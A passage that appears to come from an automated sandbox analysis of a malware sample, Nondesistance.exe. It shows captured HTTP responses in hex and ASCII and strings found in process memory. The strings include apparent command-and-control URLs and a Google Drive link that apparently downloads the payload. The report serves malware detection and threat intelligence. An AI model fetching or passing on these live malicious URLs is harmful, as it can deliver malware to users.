62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 32 30 22 20 68 65 69 67 68 74 3d 22 38 38 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 3e 34 30 34 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:37:36 GMTServer: ApacheX-SERVER: 3908Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 64 75 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Mon, 27 May 2024 10:38:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeSet-Cookie: PHPSESSID=1vdklb6ta12o9p8t3rtq5b1n4n; path=/; domain=valentinaetommaso.it; HttpOnlyExpires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheData Raw: 61 31 34 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 6c 61 6e 67 3d 22 69 74 22 3e 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 32 64 2f 32 64 69 2f 32 64 69 76 33 68 2e 73 76 67 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 61 6e 79 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 30 37 2f 30 37 66 2f 30 37 66 7a 71 38 2e 73 76 67 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 22 20 73 69 7a 65 73 3d 22 31 36 78 31 36 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 31 64 69 32 6c 7a 75 68 39 37 66 68 32 2e 63 6c 6f 75 64 66 72 6f 6e 74 2e 6e 65 74 2f 66 69 6c 65 73 2f 31 6a 2f 31 6a 33 2f 31 6a 33 37 36 37 2e 69 63 6f 3f 70 68 3d 63 62 33 61 37 38 65 39 35 37 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:38:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:38:53 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:38:55 GMTServer: ApacheX-SERVER: 3908Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 64 75 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 27 May 2024 10:39:05 GMTServer: ApacheX-SERVER: 3908Content-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 64 75 64 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /udud/ was not found on this server.</p></body></html>

Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000777E000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000697E000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://goge8opp.com:301
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006E12000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.0000000006012000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://grimfilm.co.kr/udud/?Pl9P8ldX=c3hfmT3ov0JTxeaB3Np5dAzfMERgbCa9qyeMZ0b4or2kTnd0L4sYzpUTGn0Lvbc
Source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
Source: Nondesistance.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Nondesistance.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://tilda.cc
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.000000000745A000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.000000000665A000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://tilda.ws/img/logo404.png
Source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000649000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.gopher.ftp://ftp.
Source: Nondesistance.exe, 00000009.00000001.20120981057.0000000000626000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.0000000006FA4000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000061A4000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: http://www.mindfreak.live/
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25030471443.0000000000648000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.osbornesargent.co.uk
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25030471443.0000000000648000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.osbornesargent.co.uk/udud/
Source: Nondesistance.exe, 00000009.00000001.20120981057.00000000005F2000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
Source: Nondesistance.exe, 00000009.00000001.20120981057.00000000005F2000.00000020.00000001.01000000.00000009.sdmp	String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://assets.iv.lt/default.css
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://assets.iv.lt/footer.html
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000064A6000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://assets.iv.lt/header.html
Source: write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://assets.iv.lt/images/icon.png
Source: write.exe, 0000000B.00000002.25035537727.00000000056A6000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://assets.iv.lt/images/thumbnail.png
Source: write.exe, 0000000B.00000002.25039136378.0000000007C28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/client/js.polyfill/container-query-polyfill.modern.js
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/01/01h/01hx1m.css?ph=cb3a78e957
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/04/04p/04pi85.css?ph=cb3a78e957
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/07/07f/07fzq8.svg?ph=cb3a78e957
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/0e/0e7/0e7xip.css?ph=cb3a78e957
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/13/13s/13s9j7.css?ph=cb3a78e957
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/1a/1an/1anfpg.css?ph=cb3a78e957
Source: write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/1j/1j3/1j3767.ico?ph=cb3a78e957
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2d/2di/2div3h.svg?ph=cb3a78e957
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/2v/2v4/2v414g.css?ph=cb3a78e957
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/32/32i/32i65q.css?ph=cb3a78e957
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/39/396/39634o.js?ph=cb3a78e957
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/3c/3cw/3cwfrk.css?ph=cb3a78e957
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/3f/3f9/3f9vvf.css?ph=cb3a78e957
Source: jbBlvVPHmIIgIHiOBCnstGcDCWhN.exe, 0000000A.00000002.25047145901.00000000067CA000.00000004.80000000.00040000.00000000.sdmp, write.exe, 0000000B.00000002.25035537727.00000000059CA000.00000004.10000000.00040000.00000000.sdmp	String found in binary or memory: https://d1di2lzuh97fh2.cloudfront.net/files/4a/4a3/4a3t1k.css?ph=cb3a78e957
Source: Nondesistance.exe, 00000009.00000002.20393067767.0000000002168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/Hd
Source: Nondesistance.exe, 00000009.00000002.20393067767.0000000002168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/hd
Source: Nondesistance.exe, 00000009.00000002.20393067767.0000000002168000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm
Source: Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: Nondesistance.exe, 00000009.00000003.20206385128.00000000021ED000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300938788.00000000021D5000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20220244421.00000000021E8000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20300858589.00000000021E1000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000002.20393067767.00000000021D5000.00000004.00000020.00020000.00000000.sdmp, Nondesistance.exe, 00000009.00000003.20206241207.00000000021ED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1SoBWlxXWVZs3OQ__EvL5oLC5wlw_7PLm&export=download
